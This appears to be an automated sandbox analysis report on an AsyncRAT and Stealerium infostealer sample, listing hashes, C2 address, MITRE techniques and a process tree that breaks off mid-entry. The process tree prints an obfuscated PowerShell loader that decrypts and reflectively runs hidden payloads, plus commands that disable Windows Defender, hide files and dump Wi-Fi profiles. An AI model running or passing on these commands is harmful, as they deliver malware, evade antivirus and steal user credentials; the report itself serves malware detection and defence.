asyncrat | 06bf5c4fae8a3daae451bd03bd5c2939c3698779d11fe438bf3cbe00d7d8f116

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14-07-2024 21:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Infected.exe
Size

4.6MB
MD5

35eefe804869dc29fb80b873a22b5429
SHA1

e360ffd23f110a02fede39d6cf5c11bad9942a7e
SHA256

06bf5c4fae8a3daae451bd03bd5c2939c3698779d11fe438bf3cbe00d7d8f116
SHA512

f6e76e5d768666232781cab6230a6c7bc2e1d95988442240875b94264db41412d66bfae39b3097dbab44585d4e6f124543e3a2d9a0a6c4374ed3bef6490fda9b
SSDEEP

98304:tV/iK0UflRkkurEShUyGgjTbOMqYW9MSJjJ473+jzJQ9Dy8DB89U:fzDRkkurEyRjTPqYbSVm732dQA8DBB

Score

10^/10

asyncrat stealerium default collection execution persistence privilege_escalation rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:7620

matter-ivory.gl.at.ply.gg:7620

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Stealerium
An open source info stealer written in C# first seen in May 2022.
stealer stealerium

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/1616-34-0x0000000007C20000-0x0000000007C36000-memory.dmp	family_asyncrat
behavioral2/files/0x000200000001e792-39.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4816	powershell.exe
1616	powershell.exe
3652	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	skuld.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	Infected.exe

Executes dropped EXE 2 IoCs

pid	Process
2436	Infected.exe
516	skuld.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Infected.exe
Key opened	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Infected.exe
Key opened	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Infected.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	skuld.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
11	discord.com
16	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com
55	icanhazip.com
58	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Infected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Infected.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5700	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4520	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	28	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	skuld.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	skuld.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	skuld.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1616	powershell.exe
1616	powershell.exe
516	skuld.exe
516	skuld.exe
516	skuld.exe
516	skuld.exe
516	skuld.exe
516	skuld.exe
4816	powershell.exe
4816	powershell.exe
3468	powershell.exe
3468	powershell.exe
3468	powershell.exe
3652	powershell.exe
3652	powershell.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe
2436	Infected.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	516	skuld.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeIncreaseQuotaPrivilege	4204	wmic.exe
Token: SeSecurityPrivilege	4204	wmic.exe
Token: SeTakeOwnershipPrivilege	4204	wmic.exe
Token: SeLoadDriverPrivilege	4204	wmic.exe
Token: SeSystemProfilePrivilege	4204	wmic.exe
Token: SeSystemtimePrivilege	4204	wmic.exe
Token: SeProfSingleProcessPrivilege	4204	wmic.exe
Token: SeIncBasePriorityPrivilege	4204	wmic.exe
Token: SeCreatePagefilePrivilege	4204	wmic.exe
Token: SeBackupPrivilege	4204	wmic.exe
Token: SeRestorePrivilege	4204	wmic.exe
Token: SeShutdownPrivilege	4204	wmic.exe
Token: SeDebugPrivilege	4204	wmic.exe
Token: SeSystemEnvironmentPrivilege	4204	wmic.exe
Token: SeRemoteShutdownPrivilege	4204	wmic.exe
Token: SeUndockPrivilege	4204	wmic.exe
Token: SeManageVolumePrivilege	4204	wmic.exe
Token: 33	4204	wmic.exe
Token: 34	4204	wmic.exe
Token: 35	4204	wmic.exe
Token: 36	4204	wmic.exe
Token: SeIncreaseQuotaPrivilege	4204	wmic.exe
Token: SeSecurityPrivilege	4204	wmic.exe
Token: SeTakeOwnershipPrivilege	4204	wmic.exe
Token: SeLoadDriverPrivilege	4204	wmic.exe
Token: SeSystemProfilePrivilege	4204	wmic.exe
Token: SeSystemtimePrivilege	4204	wmic.exe
Token: SeProfSingleProcessPrivilege	4204	wmic.exe
Token: SeIncBasePriorityPrivilege	4204	wmic.exe
Token: SeCreatePagefilePrivilege	4204	wmic.exe
Token: SeBackupPrivilege	4204	wmic.exe
Token: SeRestorePrivilege	4204	wmic.exe
Token: SeShutdownPrivilege	4204	wmic.exe
Token: SeDebugPrivilege	4204	wmic.exe
Token: SeSystemEnvironmentPrivilege	4204	wmic.exe
Token: SeRemoteShutdownPrivilege	4204	wmic.exe
Token: SeUndockPrivilege	4204	wmic.exe
Token: SeManageVolumePrivilege	4204	wmic.exe
Token: 33	4204	wmic.exe
Token: 34	4204	wmic.exe
Token: 35	4204	wmic.exe
Token: 36	4204	wmic.exe
Token: SeDebugPrivilege	2436	Infected.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeIncreaseQuotaPrivilege	3656	wmic.exe
Token: SeSecurityPrivilege	3656	wmic.exe
Token: SeTakeOwnershipPrivilege	3656	wmic.exe
Token: SeLoadDriverPrivilege	3656	wmic.exe
Token: SeSystemProfilePrivilege	3656	wmic.exe
Token: SeSystemtimePrivilege	3656	wmic.exe
Token: SeProfSingleProcessPrivilege	3656	wmic.exe
Token: SeIncBasePriorityPrivilege	3656	wmic.exe
Token: SeCreatePagefilePrivilege	3656	wmic.exe
Token: SeBackupPrivilege	3656	wmic.exe
Token: SeRestorePrivilege	3656	wmic.exe
Token: SeShutdownPrivilege	3656	wmic.exe
Token: SeDebugPrivilege	3656	wmic.exe
Token: SeSystemEnvironmentPrivilege	3656	wmic.exe
Token: SeRemoteShutdownPrivilege	3656	wmic.exe
Token: SeUndockPrivilege	3656	wmic.exe
Token: SeManageVolumePrivilege	3656	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 556 wrote to memory of 1180	556	Infected.exe	86
PID 556 wrote to memory of 1180	556	Infected.exe	86
PID 556 wrote to memory of 1180	556	Infected.exe	86
PID 1180 wrote to memory of 3176	1180	cmd.exe	91
PID 1180 wrote to memory of 3176	1180	cmd.exe	91
PID 1180 wrote to memory of 3176	1180	cmd.exe	91
PID 1180 wrote to memory of 1616	1180	cmd.exe	92
PID 1180 wrote to memory of 1616	1180	cmd.exe	92
PID 1180 wrote to memory of 1616	1180	cmd.exe	92
PID 1616 wrote to memory of 2436	1616	powershell.exe	94
PID 1616 wrote to memory of 2436	1616	powershell.exe	94
PID 1616 wrote to memory of 516	1616	powershell.exe	93
PID 1616 wrote to memory of 516	1616	powershell.exe	93
PID 516 wrote to memory of 3708	516	skuld.exe	95
PID 516 wrote to memory of 3708	516	skuld.exe	95
PID 516 wrote to memory of 4816	516	skuld.exe	97
PID 516 wrote to memory of 4816	516	skuld.exe	97
PID 516 wrote to memory of 4204	516	skuld.exe	99
PID 516 wrote to memory of 4204	516	skuld.exe	99
PID 516 wrote to memory of 4156	516	skuld.exe	101
PID 516 wrote to memory of 4156	516	skuld.exe	101
PID 516 wrote to memory of 3468	516	skuld.exe	104
PID 516 wrote to memory of 3468	516	skuld.exe	104
PID 516 wrote to memory of 3656	516	skuld.exe	106
PID 516 wrote to memory of 3656	516	skuld.exe	106
PID 516 wrote to memory of 4520	516	skuld.exe	108
PID 516 wrote to memory of 4520	516	skuld.exe	108
PID 516 wrote to memory of 3712	516	skuld.exe	110
PID 516 wrote to memory of 3712	516	skuld.exe	110
PID 516 wrote to memory of 2852	516	skuld.exe	112
PID 516 wrote to memory of 2852	516	skuld.exe	112
PID 516 wrote to memory of 1352	516	skuld.exe	114
PID 516 wrote to memory of 1352	516	skuld.exe	114
PID 516 wrote to memory of 3268	516	skuld.exe	116
PID 516 wrote to memory of 3268	516	skuld.exe	116
PID 516 wrote to memory of 3652	516	skuld.exe	118
PID 516 wrote to memory of 3652	516	skuld.exe	118
PID 3652 wrote to memory of 2144	3652	powershell.exe	120
PID 3652 wrote to memory of 2144	3652	powershell.exe	120
PID 2144 wrote to memory of 1852	2144	csc.exe	121
PID 2144 wrote to memory of 1852	2144	csc.exe	121
PID 2436 wrote to memory of 3488	2436	Infected.exe	124
PID 2436 wrote to memory of 3488	2436	Infected.exe	124
PID 3488 wrote to memory of 1712	3488	cmd.exe	126
PID 3488 wrote to memory of 1712	3488	cmd.exe	126
PID 3488 wrote to memory of 5520	3488	cmd.exe	127
PID 3488 wrote to memory of 5520	3488	cmd.exe	127
PID 3488 wrote to memory of 2468	3488	cmd.exe	128
PID 3488 wrote to memory of 2468	3488	cmd.exe	128
PID 2436 wrote to memory of 1576	2436	Infected.exe	129
PID 2436 wrote to memory of 1576	2436	Infected.exe	129
PID 1576 wrote to memory of 5012	1576	cmd.exe	131
PID 1576 wrote to memory of 5012	1576	cmd.exe	131
PID 1576 wrote to memory of 2352	1576	cmd.exe	132
PID 1576 wrote to memory of 2352	1576	cmd.exe	132
PID 2436 wrote to memory of 4328	2436	Infected.exe	133
PID 2436 wrote to memory of 4328	2436	Infected.exe	133
PID 4328 wrote to memory of 5116	4328	cmd.exe	135
PID 4328 wrote to memory of 5116	4328	cmd.exe	135
PID 4328 wrote to memory of 2964	4328	cmd.exe	136
PID 4328 wrote to memory of 2964	4328	cmd.exe	136
PID 4328 wrote to memory of 4924	4328	cmd.exe	137
PID 4328 wrote to memory of 4924	4328	cmd.exe	137
PID 2436 wrote to memory of 3408	2436	Infected.exe	138

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3708	attrib.exe
4156	attrib.exe
3712	attrib.exe
2852	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Infected.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Infected.exe

C:\Users\Admin\AppData\Local\Temp\Infected.exe
"C:\Users\Admin\AppData\Local\Temp\Infected.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zf2tMBcGp3hwF4FZUItmcIgUcPp+j72YioWbRlDJta4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bO8cIdciqhKkrYo83c3cUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nVxAI=New-Object System.IO.MemoryStream(,$param_var); $BIIJJ=New-Object System.IO.MemoryStream; $Yvhyo=New-Object System.IO.Compression.GZipStream($nVxAI, [IO.Compression.CompressionMode]::Decompress); $Yvhyo.CopyTo($BIIJJ); $Yvhyo.Dispose(); $nVxAI.Dispose(); $BIIJJ.Dispose(); $BIIJJ.ToArray();}function execute_function($param_var,$param2_var){ $gxqAr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NltzE=$gxqAr.EntryPoint; $NltzE.Invoke($null, $param2_var);}$nwWil = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.bat';$host.UI.RawUI.WindowTitle = $nwWil;$DprSi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nwWil).Split([Environment]::NewLine);foreach ($dZZtp in $DprSi) { if ($dZZtp.StartsWith('vqImMRbNlIuMBiftLQqW')) { $igWwD=$dZZtp.Substring(20); break; }}$payloads_var=[string[]]$igWwD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:516
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
        5⤵
        Views/modifies file attributes
        
        PID:3708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        5⤵
        Views/modifies file attributes
        
        PID:4156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3656
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4520
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3712
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2852
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:1352
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
